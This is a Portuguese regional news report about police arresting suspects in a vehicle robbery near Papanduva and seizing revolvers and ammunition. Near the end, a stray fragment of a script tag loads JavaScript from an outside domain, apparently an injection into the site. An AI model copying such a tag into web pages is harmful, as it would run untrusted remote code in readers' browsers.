InícioDestaquePM DE CANOINHAS: FLAGRANTE A SUSPEITOS DE ROUBO, APREENSÃO DE ARMA DE...

PM DE CANOINHAS: FLAGRANTE A SUSPEITOS DE ROUBO, APREENSÃO DE ARMA DE FOGO E RECUPERAÇÃO DE VEÍCULO ROUBADO

Últimas notícias

GAECO e GEAC deflagram 5ª fase da Operação Mensageiro; deputado é visitado

Na manhã desta segunda-feira (29-4), o Grupo de Atuação...

Acidente na BR-116 resulta em cinco mortes

Na noite deste domingo (28), equipes do Corpo de...

Colisão na BR-280 em Três Barras, mata mulher e deixa seis feridos

Na noite deste domingo, 28, os bombeiros de Três...

Na sexta-feira, 04, a Central de Emergência de Mafra informou as equipes da PM de Canoinhas, que havia ocorrido um roubo de veiculo na localidade de Rodeiozinho, interior da cidade de Papanduva.

 

 

Uma equipe da PM deslocou em rondas pela Rodovia SC 477, sentido Papanduva e lá entrou em contato com a equipe PM local, solicitando maiores informações de vítima e possíveis autores do roubo, os quais informaram o local do crime. Após contato com a vítima, a mesma informou que três homens chegaram em sua residência com um veiculo Ford Fiesta, de cor vermelha, todos armados, para cobrar uma divida, contudo, um deles sacou de uma arma e o ameaçou dizendo que não sairia do local sem nada.

 

 

Logo após subtraíram seu veículo Fiat Strada  e se evadiram do local. Os policiais reconheceram um dos autores do roubo, e de posse das informações, solicitaram apoio de outras equipes e também da Agência de Inteligência do 3º BPM para proceder em buscas na residência, sendo na localidade de Imbuia em Bela Vista do Toldo.

 

 

No deslocamento, as equipes da PM se depararam  com um dos suspeitos conduzindo uma motocicleta e seu pai um veículo VW Saveiro, na estrada Geral de Imbuia. Após contato inicial ambos informaram que haviam subtraído o veículo da vítima, porém abandonaram no centro de Papanduva, após avistarem uma viatura da PM. Informaram que possuíam um revólver e munições os quais estariam escondidos na residência.

 

 

Logo após informaram que havia mais um homem que ajudou no roubo, e que estavam indo buscá-lo, pois era ele que conduzia o veículo da vítima e que estaria a pé. Enquanto uma equipe da PM procedia na abordagem a outras, deslocaram até a residência dos autores, onde foi localizado um revólver, calibre 38, um revólver, calibre 22, com numeração raspada, varias munições calibre 38,  22, 12, e 32, sendo várias intactas e várias já deflagradas.

 

 

Após  informações dos suspeitos os policiais militares deslocaram até uma residência no loteamento Santa Cruz, onde localizaram e deteram um jovem, o qual, segundo a vítima, teria lhe ameaçado com uma arma. Diante dos fatos, os autores, veículo e armas utilizadas para prática do roubo, foram encaminhados para Delegacia de Polícia para providencias.

 

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.